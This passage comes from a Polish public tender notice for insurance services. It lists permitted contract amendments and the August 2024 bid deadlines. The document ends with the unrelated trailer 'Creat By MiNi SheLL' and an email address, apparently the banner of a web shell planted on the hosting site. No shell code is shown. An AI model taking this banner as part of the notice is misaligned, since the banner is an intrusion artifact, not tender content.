ubiegające się o udzielenie zamówienia.<br/>7.6.4. Wszelka korespondencja prowadzona będzie wyłącznie z pełnomocnikiem.<br/>7.6.5. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do ofert oświadczenie, z którego wynika,<br/>które usługi wykonują poszczególni wykonawcy. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zawarte są w projektowanych postanowieniach umownych.<br/>W odniesieniu do art. 455 ust. 1 ustawy Prawo zamówień publicznych w trakcie realizacji Umowy <br/>postanowienia Umowy mogą ulec zmianom, jeżeli konieczność wprowadzenia zmian wynikać <br/>będzie z okoliczności, których nie można było przewidzieć w chwili zawarcia Umowy, <br/>a w szczególności zmiany postanowień umowy mogą dotyczyć:<br/>82 82<br/>1.1. regulacji prawnych wprowadzonych w życie po dacie podpisania Umowy, wpływających na <br/>sposób realizacji umowy i powodujących konieczność zmiany umowy wraz ze skutkami <br/>wprowadzenia takiej zmiany, o ile nie będą wpływały na zmianę ogólnego charakteru <br/>umowy;<br/>1.2. oznaczenia danych dotyczących Zamawiającego lub Wykonawcy, w tym m.in. danych <br/>teleadresowych, nr telefonicznych, nr kont bankowych;<br/>1.3. zaistnienia omyłki pisarskiej lub rachunkowej;<br/>1.4. ujawnienia się lub powstania nowego ryzyka ubezpieczeniowego nieprzewidzianego w SWZ;<br/>1.5. wzrostu lub spadku ilości albo wartości przedmiotu ubezpieczenia;<br/>1.6. konieczności zmiany wysokości sum ubezpieczenia, limitów odpowiedzialności wynikającej <br/>z zobowiązań Zamawiającego zaciągniętych po zawarciu Umowy;<br/>1.7. zmiany przedmiotu ubezpieczenia na zasadach określonych w Umowie Generalnej <br/>Ubezpieczenia Części 1;<br/>1.8. wyczerpania sumy gwarancyjnej lub jej części, o której mowa w Umowie Generalnej <br/>Ubezpieczenia Części 1 zamówienia, w Sekcji III; <br/>1.9. zmian korzystnych dla Zamawiającego, w szczególności polegających na obniżeniu stawek <br/>ubezpieczeniowych, franszyz, udziałów własnych obowiązujących w Umowie;<br/>1.10. powstania rozbieżności lub niejasności w rozumieniu pojęć użytych w Umowie, których nie <br/>będzie można usunąć w inny sposób, a zmiana będzie umożliwiać usunięcie rozbieżności i <br/>doprecyzowanie Umowy w celu jednoznacznej interpretacji jej zapisów przez <br/>Zamawiającego i Wykonawcę;<br/>- z zastrzeżeniem, że wskutek przedmiotowej zmiany wzrost lub obniżenie składki spowodowany <br/>każdą kolejną zmianą nie przekroczy 50% wartości pierwotnej składki, o której mowa § 5 ust. 1. <br/>Zmiana może nastąpić na wniosek Ubezpieczającego.<br/>2. Wprowadzenie zmiany postanowień Umowy, o których mowa ust. 1 oraz § 5 ust. 9-11 wymaga <br/>aneksu sporządzonego w formie pisemnej pod rygorem nieważności <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2024-08-05 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://platformazakupowa.pl/pn/powiatpajeczno</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2024-08-05 09:15</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com